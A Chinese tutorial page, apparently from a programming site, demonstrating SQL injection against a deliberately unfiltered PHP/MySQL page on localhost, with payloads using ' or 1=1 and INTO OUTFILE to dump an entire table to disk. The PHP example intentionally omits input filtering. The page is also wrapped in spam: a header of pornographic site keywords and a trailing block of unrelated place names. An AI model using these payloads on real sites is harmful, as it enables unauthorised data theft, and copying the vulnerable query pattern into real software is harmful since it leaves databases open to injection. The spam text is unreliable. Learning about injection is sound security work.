最新国产好看的视频,伊人天堂AV在线,国产Aaaaaa视频,蜜臀视频在线观看一区,人妻av色图,密臀久久久精品影片,青青视频免费观看毛片,久草在线观看视,国产三级精品色情在线

利用SQL注入漏洞拖庫(kù)的方法

 更新時(shí)間:2012年01月12日 21:47:32   作者:  
利用SQL注入漏洞登錄后臺(tái)和利用SQL注入漏洞拖庫(kù)是我學(xué)習(xí)了相關(guān)內(nèi)容之后的一點(diǎn)小結(jié),沒(méi)啥深度,正如文章開(kāi)頭所說(shuō),權(quán)當(dāng)總結(jié),別無(wú)它意
想在本地測(cè)試的話,可以在此免積分下載:利用SQL注入漏洞拖庫(kù)
同上一篇文章一樣,我們需要?jiǎng)?chuàng)建數(shù)據(jù)表,并在表中出入幾條數(shù)據(jù)以備測(cè)試之用。
在數(shù)據(jù)庫(kù)中建立一張表:
復(fù)制代碼 代碼如下:

CREATE TABLE `article` (
`articleid` int(11) NOT NULL AUTO_INCREMENT,
`title` varchar(100) CHARACTER SET utf8 NOT NULL DEFAULT '',
`content` text CHARACTER SET utf8 NOT NULL,
PRIMARY KEY (`articleid`)
) ENGINE=MyISAM AUTO_INCREMENT=7 DEFAULT CHARSET=latin1;

在表中插入數(shù)據(jù)的操作我就不貼代碼了,可以去下載下來(lái)直接導(dǎo)入到數(shù)據(jù)庫(kù)。
接下來(lái),寫(xiě)一個(gè)處理用戶請(qǐng)求的頁(yè)面,這里,我們故意不過(guò)濾用戶提交過(guò)來(lái)的數(shù)據(jù),留下個(gè)SQL注入漏洞用來(lái)測(cè)試。
代碼如下:
復(fù)制代碼 代碼如下:

<?php
$servername = "localhost";
$dbusername = "root";
$dbpassword = "";
$dbname = "test";
$id=$_GET['id'];//id未經(jīng)過(guò)濾
$conn=mysql_connect($servername,$dbusername,$dbpassword) or die ("數(shù)據(jù)庫(kù)連接失敗");
mysql_select_db($dbname,$conn);
mysql_query('set names utf8');
$sql = "SELECT * FROM article WHERE articleid='$id'";
$result = mysql_query($sql,$conn);
$row = mysql_fetch_array($result);
echo "<p>利用SQL注入漏洞拖庫(kù)<p>";
if (!$row){
echo "該記錄不存在";
exit;
}
echo "標(biāo)題<br>".$row['title']."<p>";
echo "內(nèi)容<br>".$row['content']."<p>";
?>

我們直接在瀏覽器中輸入:
http://127.0.0.1/marcofly/phpstudy/sqlinsert/showart.php?id=1
即可訪問(wèn)article表中id為1的一條記錄
訪問(wèn)結(jié)果如下:

接下來(lái),我們就利用這個(gè)漏洞(不知道該漏洞的情況下,只能通過(guò)工具+手工檢測(cè)),演示一下如何將article表下載下來(lái)。
在地址欄中輸入:' into outfile 'e:/sql.txt'%23
分析:%23是#的ASCII碼,由于在地址欄中直接輸入#后到數(shù)據(jù)庫(kù)系統(tǒng)中會(huì)變成空,需要在地址欄中輸入%23,那么才會(huì)變成#,進(jìn)而注釋掉后面的sql語(yǔ)句。
運(yùn)行之后,打開(kāi)E盤(pán),發(fā)現(xiàn)多了一個(gè)sql.txt文件,打開(kāi)之后,里面就是表article中的一條記錄。
為什么只有一條記錄呢?難道該數(shù)據(jù)表就只有一條記錄?不是這樣的,因?yàn)槲覀冎粰z索id為1的一條記錄而已,那么能否將article表中的所有記錄一次性全部下載下來(lái)呢?
答案是可以的,只要你的構(gòu)造的SQL語(yǔ)句足夠靈活(再次提出了構(gòu)造SQL語(yǔ)句的靈活性)。
分析一下,當(dāng)在URL地址欄中輸入'into outfile 'e:/sql.txt'%23的時(shí)候,合并到sql查詢語(yǔ)句中變?yōu)椋?
SELECT * FROM article WHERE articleid='5' into outfile 'e:/whf.txt'#'
仔細(xì)分析下之后,我們可以這樣子構(gòu)造SQL語(yǔ)句:
SELECT * FROM article WHERE articleid='' or 1=1 into outfile 'e:/whf.txt'#'
這樣的話,無(wú)論如何WHERE子句總是為真,換句話說(shuō),該sql語(yǔ)句等價(jià)于如下:
SELECT * FROM article into outfile 'e:/whf.txt'#'
懂了吧,該sql語(yǔ)句在先執(zhí)行select語(yǔ)句,將表article中的所以內(nèi)容全部檢索出來(lái),然后再執(zhí)行into outfile 'e:/whf.txt'#'將內(nèi)容導(dǎo)出來(lái)。
不信的話,你執(zhí)行下……
利用SQL注入漏洞,我們可以猜測(cè)表名,列名,用戶的密碼長(zhǎng)度(LEFT函數(shù))等等,當(dāng)然了,如果能直接向以上的演示那樣將表中的數(shù)據(jù)全部導(dǎo)出的話就沒(méi)必要去猜表名列名等等。
有點(diǎn)累了,就寫(xiě)到這里了。
利用SQL注入漏洞登錄后臺(tái)和利用SQL注入漏洞拖庫(kù)是我學(xué)習(xí)了相關(guān)內(nèi)容之后的一點(diǎn)小結(jié),沒(méi)啥深度,正如文章開(kāi)頭所說(shuō),權(quán)當(dāng)總結(jié),別無(wú)它意。

相關(guān)文章

  • MySQL8下忘記密碼后重置密碼的辦法(MySQL老方法不靈了)

    MySQL8下忘記密碼后重置密碼的辦法(MySQL老方法不靈了)

    這篇文章主要介紹了MySQL8下忘記密碼后重置密碼的辦法,MySQL的密碼是存放在user表里面的,修改密碼其實(shí)就是修改表中記錄,重置的思路是是想辦法不用密碼進(jìn)入系統(tǒng),然后用數(shù)據(jù)庫(kù)命令修改表user中的密碼記錄
    2018-08-08
  • mysql_connect(): Connection using old (pre-4.1.1) authentication protocol refused

    mysql_connect(): Connection using old (pre-4.1.1) authentica

    MySQL錯(cuò)誤提示:Connection using old (pre-4.1.1) authentication protocol refused (client option ‘secure_auth’ enabled)解決辦法,需要的朋友可以參考下
    2014-04-04
  • MySQL主從同步中的server-id示例詳解

    MySQL主從同步中的server-id示例詳解

    這篇文章主要給大家介紹了關(guān)于MySQL主從同步中server-id的相關(guān)資料,文中通過(guò)示例代碼介紹的非常詳細(xì),對(duì)大家學(xué)習(xí)或者使用MySQL具有一定的參考學(xué)習(xí)價(jià)值,需要的朋友們下面來(lái)一起學(xué)習(xí)學(xué)習(xí)吧
    2019-09-09
  • 高效數(shù)據(jù)流轉(zhuǎn):Mycat分庫(kù)分表與GreatSQL實(shí)時(shí)同步

    高效數(shù)據(jù)流轉(zhuǎn):Mycat分庫(kù)分表與GreatSQL實(shí)時(shí)同步

    聚焦數(shù)據(jù)庫(kù)擴(kuò)容與實(shí)時(shí)數(shù)據(jù)同步,探索MyCat分庫(kù)分表與GreatSQL的強(qiáng)大結(jié)合!想在大規(guī)模數(shù)據(jù)處理中游刃有余?本指南將帶你輕松掌握MyCat的分布式解決方案和GreatSQL的實(shí)時(shí)同步機(jī)制,讓高效、穩(wěn)定的數(shù)據(jù)庫(kù)管理觸手可及,一起揭開(kāi)高并發(fā)環(huán)境下數(shù)據(jù)庫(kù)優(yōu)化的神秘面紗吧!
    2024-01-01
  • CentOS7使用rpm包安裝mysql 5.7.18

    CentOS7使用rpm包安裝mysql 5.7.18

    這篇文章主要為大家詳細(xì)介紹了CentOS7使用rpm包安裝mysql 5.7.18的相關(guān)步驟,具有一定的參考價(jià)值,感興趣的小伙伴們可以參考一下
    2017-06-06
  • 詳解Mysql order by與limit混用陷阱

    詳解Mysql order by與limit混用陷阱

    這篇文章主要介紹了詳解Mysql order by與limit混用陷阱,文中通過(guò)示例代碼介紹的非常詳細(xì),對(duì)大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,需要的朋友們下面隨著小編來(lái)一起學(xué)習(xí)學(xué)習(xí)吧
    2021-05-05
  • MHA實(shí)現(xiàn)mysql主從數(shù)據(jù)庫(kù)手動(dòng)切換的方法

    MHA實(shí)現(xiàn)mysql主從數(shù)據(jù)庫(kù)手動(dòng)切換的方法

    這篇文章主要介紹了MHA實(shí)現(xiàn)mysql主從數(shù)據(jù)庫(kù)手動(dòng)切換的方法,詳細(xì)的講述了主從數(shù)據(jù)庫(kù)切換的步驟與方法,非常實(shí)用,需要的朋友可以參考下
    2014-10-10
  • MySQL下載安裝、配置與使用教程詳細(xì)版(win7x64)

    MySQL下載安裝、配置與使用教程詳細(xì)版(win7x64)

    這篇文章主要為大家詳細(xì)介紹了MySQL下載安裝、配置與使用的具體操作教程,很詳細(xì),感興趣的小伙伴們可以參考一下
    2016-05-05
  • MySQL Installer 8.0.21安裝教程圖文詳解

    MySQL Installer 8.0.21安裝教程圖文詳解

    這篇文章主要介紹了MySQL Installer 8.0.21安裝教程,本文通過(guò)圖文并茂的形式給大家介紹的非常詳細(xì),對(duì)大家的學(xué)習(xí)或工作具有一定的參考借鑒價(jià)值,需要的朋友可以參考下
    2020-08-08

最新評(píng)論

巩义市| 繁峙县| 高州市| 响水县| 普兰店市| 南昌市| 电白县| 尉氏县| 嘉定区| 英吉沙县| 龙游县| 唐河县| 长海县| 浪卡子县| 双江| 彰化市| 惠东县| 搜索| 都兰县| 南华县| 新化县| 甘德县| 江达县| 余江县| 山阳县| 当涂县| 疏勒县| 中西区| 天长市| 东至县| 延津县| 宣威市| 弥渡县| 涟源市| 昭平县| 兴宁市| 那坡县| 东方市| 庄河市| 普兰县| 江门市|